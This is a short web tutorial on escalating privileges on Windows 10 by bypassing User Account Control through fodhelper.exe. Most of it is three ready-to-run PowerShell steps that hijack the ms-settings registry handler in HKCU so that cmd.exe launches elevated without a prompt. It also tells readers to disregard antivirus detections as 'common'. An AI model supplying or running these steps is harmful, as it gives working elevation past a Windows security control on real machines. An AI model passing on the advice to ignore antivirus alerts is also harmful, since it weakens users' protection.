UAC Bypass using FODhelper.exe

Privilege Escalation on Windows 10 by bypassing UAC for FODhelper.exe

what is UAC ?

User Account Control (UAC) is a fundamental component of Microsoft's overall security vision.

UAC helps mitigate the impact of malware.

Powershell COMMAND 1 : New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force

(dont worry if your AV detects it as a virus, it is common)

Powershell COMMAND 2: New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force

PowerShell Command 3:

fodhelper.exe


Print   Email

Related Articles